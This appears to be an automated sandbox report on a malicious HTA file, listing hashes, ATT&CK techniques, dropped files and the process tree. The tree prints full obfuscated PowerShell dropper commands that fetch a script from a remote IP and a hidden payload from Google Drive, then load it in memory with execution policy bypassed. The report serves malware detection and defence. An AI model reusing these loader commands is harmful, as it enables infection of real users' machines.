4145c6882b855cfbe79cbe9f9359260d503b0733ef6c901a9f62dd273568e662

Analysis

max time kernel
122s
max time network
127s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
23-10-2024 06:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

logicalwayofgreatthingswhichcreatedwithgreatwayofgood.hta
Size

130KB
MD5

16e67de00d1302e9720892be8ab6a06c
SHA1

8e8ee3df01c4fb6efd9a5289f48b9795c2483063
SHA256

4145c6882b855cfbe79cbe9f9359260d503b0733ef6c901a9f62dd273568e662
SHA512

fe6d68bc44f8b2243e1f02e77bf4c39c1ddfe4b2c0ccbf2051da7d10641d06b1da5756e1e89806c09cdad06ea9ca4074a18e98416ece919dbdda55e530a19b0a
SSDEEP

96:Eam7B6DJU946WJU92EYDF/9MM9/y80636sJU956t7T:Ea2wDJGWJtEYpJqsJtRT

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

Blocklisted process makes network request 3 IoCs

Processes:

POWeRShEll.exepowershell.exe

flow pid process

4 856 POWeRShEll.exe
6 2960 powershell.exe
8 2960 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

2900 powershell.exe
2960 powershell.exe
Evasion via Device Credential Deployment 2 IoCs
defense_evasion execution

Processes:

POWeRShEll.exepowershell.exe

pid process

856 POWeRShEll.exe
2748 powershell.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

5 drive.google.com
6 drive.google.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	pid	process
4	856	POWeRShEll.exe
6	2960	powershell.exe
8	2960	powershell.exe

pid	process
2900	powershell.exe
2960	powershell.exe

pid	process
856	POWeRShEll.exe
2748	powershell.exe

flow	ioc
5	drive.google.com
6	drive.google.com

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

csc.execvtres.exeWScript.exepowershell.exepowershell.exemshta.exePOWeRShEll.exepowershell.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	POWeRShEll.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Suspicious behavior: EnumeratesProcesses 6 IoCs

Processes:

POWeRShEll.exepowershell.exepowershell.exepowershell.exe

pid process

856 POWeRShEll.exe
2748 powershell.exe
856 POWeRShEll.exe
856 POWeRShEll.exe
2900 powershell.exe
2960 powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
856	POWeRShEll.exe
2748	powershell.exe
856	POWeRShEll.exe
856	POWeRShEll.exe
2900	powershell.exe
2960	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

POWeRShEll.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	856	POWeRShEll.exe
Token: SeDebugPrivilege	2748	powershell.exe
Token: SeDebugPrivilege	2900	powershell.exe
Token: SeDebugPrivilege	2960	powershell.exe

Suspicious use of WriteProcessMemory 28 IoCs

Processes:

mshta.exePOWeRShEll.execsc.exeWScript.exepowershell.exe

description	pid	process	target process
PID 2332 wrote to memory of 856	2332	mshta.exe	POWeRShEll.exe
PID 2332 wrote to memory of 856	2332	mshta.exe	POWeRShEll.exe
PID 2332 wrote to memory of 856	2332	mshta.exe	POWeRShEll.exe
PID 2332 wrote to memory of 856	2332	mshta.exe	POWeRShEll.exe
PID 856 wrote to memory of 2748	856	POWeRShEll.exe	powershell.exe
PID 856 wrote to memory of 2748	856	POWeRShEll.exe	powershell.exe
PID 856 wrote to memory of 2748	856	POWeRShEll.exe	powershell.exe
PID 856 wrote to memory of 2748	856	POWeRShEll.exe	powershell.exe
PID 856 wrote to memory of 2628	856	POWeRShEll.exe	csc.exe
PID 856 wrote to memory of 2628	856	POWeRShEll.exe	csc.exe
PID 856 wrote to memory of 2628	856	POWeRShEll.exe	csc.exe
PID 856 wrote to memory of 2628	856	POWeRShEll.exe	csc.exe
PID 2628 wrote to memory of 1716	2628	csc.exe	cvtres.exe
PID 2628 wrote to memory of 1716	2628	csc.exe	cvtres.exe
PID 2628 wrote to memory of 1716	2628	csc.exe	cvtres.exe
PID 2628 wrote to memory of 1716	2628	csc.exe	cvtres.exe
PID 856 wrote to memory of 1244	856	POWeRShEll.exe	WScript.exe
PID 856 wrote to memory of 1244	856	POWeRShEll.exe	WScript.exe
PID 856 wrote to memory of 1244	856	POWeRShEll.exe	WScript.exe
PID 856 wrote to memory of 1244	856	POWeRShEll.exe	WScript.exe
PID 1244 wrote to memory of 2900	1244	WScript.exe	powershell.exe
PID 1244 wrote to memory of 2900	1244	WScript.exe	powershell.exe
PID 1244 wrote to memory of 2900	1244	WScript.exe	powershell.exe
PID 1244 wrote to memory of 2900	1244	WScript.exe	powershell.exe
PID 2900 wrote to memory of 2960	2900	powershell.exe	powershell.exe
PID 2900 wrote to memory of 2960	2900	powershell.exe	powershell.exe
PID 2900 wrote to memory of 2960	2900	powershell.exe	powershell.exe
PID 2900 wrote to memory of 2960	2900	powershell.exe	powershell.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\logicalwayofgreatthingswhichcreatedwithgreatwayofgood.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2332
- C:\Windows\SysWOW64\wInDoWSpOwErSHelL\V1.0\POWeRShEll.exe
  "C:\Windows\sYSTEM32\wInDoWSpOwErSHelL\V1.0\POWeRShEll.exe" "poWERSheLl.exE -EX bYpasS -NOp -w 1 -C DEvIcEcreDeNtIalDepLOymEnT ; IEX($(Iex('[sySTEM.tEXT.EnCODIng]'+[Char]0X3A+[cHAR]58+'utF8.geTsTRINg([SYStem.coNverT]'+[char]0X3A+[Char]0X3A+'FrombaSE64sTRInG('+[char]34+'JDYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQkVyZGVmSW5JVGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1PbiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUZU9odnlRR28sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBabnF2ekZSdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF3QnJheXl5LHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHBycEUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1QlMpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRldOQnIiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYWxBbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzQzL25ld3RoaW5nc3dpdGhncmVhdGZ0dXJ1ZXdpdGhncmVhdGRheXdlbGxiZXR0ZXJmb3JtZS50SUYiLCIkZU5WOkFQUERBVEFcbmV3dGhpbmdzd2l0aGdyZWF0ZnR1cnVld2l0aGdyZWF0ZGF5d2VsbC52YnMiLDAsMCk7c3RBclQtU0xlZXAoMyk7c3RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcbmV3dGhpbmdzd2l0aGdyZWF0ZnR1cnVld2l0aGdyZWF0ZGF5d2VsbC52YnMi'+[chAr]0X22+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:856
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpasS -NOp -w 1 -C DEvIcEcreDeNtIalDepLOymEnT
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2748
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\e0hfmjdq.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2628
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES14E9.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC14E8.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1716
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\newthingswithgreatfturuewithgreatdaywell.vbs"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1244
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJEVuVjpjb01TUEVDWzQsMTUsMjVdLWpPaW4nJykoKCgnZ1VkaW1hZ2VVcmwgPSBHNUlodHRwczovL2RyaXZlLmcnKydvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkonKydKdjFGNnZTNHNVT3libkgtc0QnKyd2VWhCWXd1ciBHNUk7Z1Vkd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVuJysndDtnVWRpbWEnKydnZUJ5dGVzID0gZ1Vkd2ViQ2xpZScrJ250LkRvd25sb2FkRGF0YShnVWRpbWFnZVVybCk7Z1VkaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoZycrJ1VkaW1hZ2VCeXRlcyk7Z1Vkc3RhcnRGbGFnID0gRzVJPDxCQVNFNjRfU1RBUlQ+Pkc1STtnVWRlbmRGbGFnID0gRzVJPDxCQVNFNjRfRU5EPj5HNUk7Z1Vkc3RhcnRJbmRleCA9IGdVZGltYWdlVGV4dC5JbmRleE9mKGdVZHN0YXJ0RmxhZyk7Z1VkZW5kSW5kZXggPSBnVWRpJysnbWFnZVRleHQuSW5kZXhPZihnVWRlbmRGbGFnKTtnVWRzdGFydEluZGV4IC1nZSAwIC1hbmQgZycrJ1UnKydkZW5kSW5kZXggLWd0IGdVZHN0YXJ0SW5kJysnZXg7Z1Vkc3QnKydhcnRJbmRleCArPSBnVWQnKydzdGFydEZsYWcuTGVuZ3RoO2dVZGJhc2U2NCcrJ0xlbmd0aCA9IGdVZGVuZEluZGV4IC0gZ1VkJysnc3RhcnRJbmRleDtnVWRiYXNlNjRDb21tYScrJ25kID0gZ1VkJysnaW1hZ2VUZXh0LlN1YnN0cmluZycrJyhnVWRzdGFyJysndEluZGV4LCAnKydnVWRiYXNlNjRMZW5ndGgpO2dVZGJhc2U2NFJldmVyc2VkICcrJz0gLWpvaW4gKGdVZGJhc2U2NENvbW1hbmQuJysnVG9DaGFyQXJyYXkoKSBXQlggRm9yRWFjaC1PYmplY3QgeyBnVWRfIH0pWy0xLi4tKGdVZGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07Z1VkY29tbWFuZEJ5dCcrJ2VzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhnVWRiYXNlNjRSZXZlcnNlZCcrJyk7Z1VkbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHknKyddOjpMJysnb2FkKGdVZGNvbW1hbmRCeXRlcyk7Z1VkdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChHNScrJ0lWQUlHNScrJ0kpO2dVJysnZHZhaU1ldGhvZC5JbnZva2UoZ1VkbnVsbCwgQChHNUl0eHQuUkZERFJDJysnTC8zNC8xNDEuNjcxLjMuMjkxLy86cHR0aEc1SSwgRzVJZGVzJysnYXRpdmFkb0c1SSwgRzVJZGVzYXRpdmEnKydkb0c1SSwgRzVJZGVzYXRpdmFkb0c1SSwgJysnRzVJQ2FzUG9sRzVJLCBHNUlkZXNhdGl2YWRvRzVJLCBHNUlkZXNhdGl2YWRvRzVJLEc1SWRlc2F0aXZhZG9HNUksRzVJZGVzYXRpdmFkb0c1SSxHNUlkZXNhdGl2JysnYWRvRzVJLEc1SWRlc2F0aXZhZG9HNUksRzVJZGVzYXRpdmFkb0c1SSxHJysnNUkxJysnRzVJLCcrJ0c1SWRlc2F0aXYnKydhZG9HNUkpKTsnKSAtY1JlUExBQ0UgICdHNUknLFtDSGFyXTM5IC1jUmVQTEFDRSdnVWQnLFtDSGFyXTM2LWNSZVBMQUNFICAoW0NIYXJdODcrW0NIYXJdNjYrW0NIYXJdODgpLFtDSGFyXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2900
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $EnV:coMSPEC[4,15,25]-jOin'')((('gUdimageUrl = G5Ihttps://drive.g'+'oogle.com/uc?export=download&id=1AIVgJJ'+'Jv1F6vS4sUOybnH-sD'+'vUhBYwur G5I;gUdwebClient = New-Object System.Net.WebClien'+'t;gUdima'+'geBytes = gUdwebClie'+'nt.DownloadData(gUdimageUrl);gUdimageText = [System.Text.Encoding]::UTF8.GetString(g'+'UdimageBytes);gUdstartFlag = G5I<<BASE64_START>>G5I;gUdendFlag = G5I<<BASE64_END>>G5I;gUdstartIndex = gUdimageText.IndexOf(gUdstartFlag);gUdendIndex = gUdi'+'mageText.IndexOf(gUdendFlag);gUdstartIndex -ge 0 -and g'+'U'+'dendIndex -gt gUdstartInd'+'ex;gUdst'+'artIndex += gUd'+'startFlag.Length;gUdbase64'+'Length = gUdendIndex - gUd'+'startIndex;gUdbase64Comma'+'nd = gUd'+'imageText.Substring'+'(gUdstar'+'tIndex, '+'gUdbase64Length);gUdbase64Reversed '+'= -join (gUdbase64Command.'+'ToCharArray() WBX ForEach-Object { gUd_ })[-1..-(gUdbase64Command.Length)];gUdcommandByt'+'es = [System.Convert]::FromBase64String(gUdbase64Reversed'+');gUdloadedAssembly = [System.Reflection.Assembly'+']::L'+'oad(gUdcommandBytes);gUdvaiMethod = [dnlib.IO.Home].GetMethod(G5'+'IVAIG5'+'I);gU'+'dvaiMethod.Invoke(gUdnull, @(G5Itxt.RFDDRC'+'L/34/141.671.3.291//:ptthG5I, G5Ides'+'ativadoG5I, G5Idesativa'+'doG5I, G5IdesativadoG5I, '+'G5ICasPolG5I, G5IdesativadoG5I, G5IdesativadoG5I,G5IdesativadoG5I,G5IdesativadoG5I,G5Idesativ'+'adoG5I,G5IdesativadoG5I,G5IdesativadoG5I,G'+'5I1'+'G5I,'+'G5Idesativ'+'adoG5I));') -cRePLACE 'G5I',[CHar]39 -cRePLACE'gUd',[CHar]36-cRePLACE ([CHar]87+[CHar]66+[CHar]88),[CHar]124))"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2960

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES14E9.tmp

Filesize
1KB

MD5
90840dafbbe4e8fe0cc6526b0dae7f11

SHA1
d8d58fb20b98dd4654168af2ff8971f38f5fcc44

SHA256
88674865c6118d2be686a48feb1f96813721f9c669c04bdcafb30d767f3b78c4

SHA512
c07bb9e5a25002d1cd90bc3181497ed5e7452c8fa8160f6a8cbaf8bc89c7790f34dd128e69becb6c0b0948ab9801b57fe671e5bb66058cf79997c9bc8b33ee63

Download Submit
C:\Users\Admin\AppData\Local\Temp\e0hfmjdq.dll

Filesize
3KB

MD5
25c28d871e82abeb41f837d7be09d6b3

SHA1
483390bdad055e033d0b59ca05439b5705fdfb92

SHA256
679c65b8db98ceb4cf151f13fad26ccecaac0235ded2825772c7a396e541548e

SHA512
e823fe39ceb074dc70213929fa72352830d7f0cb3ad57c345bc0f7325f2e99b2705d5a3b958e3c57594fc7287f067016dc218b3925cb9de93184eb6b8c1d5fae

Download Submit
C:\Users\Admin\AppData\Local\Temp\e0hfmjdq.pdb

Filesize
7KB

MD5
4ceb7abb5f06e9ed4ff63731cba88787

SHA1
0f42be282becb994d22905fa94794c4f7939bf6e

SHA256
efe860365de4884551ddb4d0c70593d198515500639acc9660d0b15a672e1022

SHA512
573b2b254597c5795fcf0a55632aa1e423e07bdaa2a73a3b9a7859b2c64b583ea0d7c91bb27c8f8e5679d23a9abc65cc84c6c64db97a4e20396aee259288553e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
eb44eb59cb6e0049288ef2083416317a

SHA1
b16d85452649fb19c8c205d4204ed47276d9cc5a

SHA256
b6a643ee6d11c4b0eb7a35b3a35ecfcd84f5c5e45702955a391bdd7880c1f0d7

SHA512
56c5037892970b78de2423450f241ffd9f4ef6dcd41bc48e152559e062468f31ebb921e25ca60ce2b253a08b967c55e3f02c5229181d3d1ec2509a5f350e8448

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
eb5de2ef978ae0b35cf69dd0f33c87b8

SHA1
de0fab7135c8a3ad159a84e3154e0fa56ff8ca90

SHA256
8daecfd128064663c0f006937798c61fa4c9c21c3b173d1f5331f4bcd3b54447

SHA512
d92b75f85792b388b38a8e31864f9df1e6b646a5a8f4cb39b27b6c8e7a22c02184443cb77a8ad6d470b98b20678fef0f01c98dfbf6cf34a6e61182e247ae849d

Download Submit
C:\Users\Admin\AppData\Roaming\newthingswithgreatfturuewithgreatdaywell.vbs

Filesize
136KB

MD5
655d556c1a60114b9c1df43ca2d1b4e9

SHA1
c339a1fb6445b5a5701ef091b328727d2e0cd894

SHA256
8895b5c34239ed56abf05b8a381be9153b25baea8167aafceafec196375cd983

SHA512
5bcb9c205e7337199e6f7c8e261fe83d1202e6d0aa084648d6d3c00e4c970d47fdbb759494e9c1b9b0347d23d24c4fd561fea17247fec9c81ca3b124b09263ba

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC14E8.tmp

Filesize
652B

MD5
d27ad6c0a5fc81416656e80af9774f4e

SHA1
83df1ed13f7216e22007830febca1d3311fceee4

SHA256
982147375d151a6cba19536f52c02c129ef8a2f3b2bab193340ae1fbfe915797

SHA512
25d78b686c7b8b702d5fdc6b6451e1f90b9765379c12b87a95f8ed2c0c35d560101f4f5e4dddd482a8949c275f99279eb0acaed73b9f75a1b5a5c9a7ba1bdfbc

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\e0hfmjdq.0.cs

Filesize
469B

MD5
b89fa3ea83594e6aed2a1cbc2ab03515

SHA1
2457f05ae6c56c192ad5d7c76694e7898ada53f8

SHA256
bd9c1570cad7cf95c39fa2a8be51a8851239e7f5cbf0bad032292f733fded0a0

SHA512
bf0334f84f3de804f868d3b447eaf98e9d6679b52015ac814cb8d71e2d3fdc90f482bfe5f2801f25a5bef0de53da747028e3d28149ac5fd5ec3cc835ca8c37aa

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\e0hfmjdq.cmdline

Filesize
309B

MD5
fdfd03c501222137d64c31e469bd5c71

SHA1
c0e65cd1eec6f2fc54265e34adce605899b8ccee

SHA256
e48ac617168d34eb86d3954b70a604aaca79f4f428b073c4eaeaedbe735ecb3a

SHA512
809d67728e465ad081ea99e2b06caf1c27f8b0e182c249b62a1ed157d9937b18974d607b06fee7412c69aec66674be971d57ec3dc5ebb65965dbded52e7d010d

Download Submit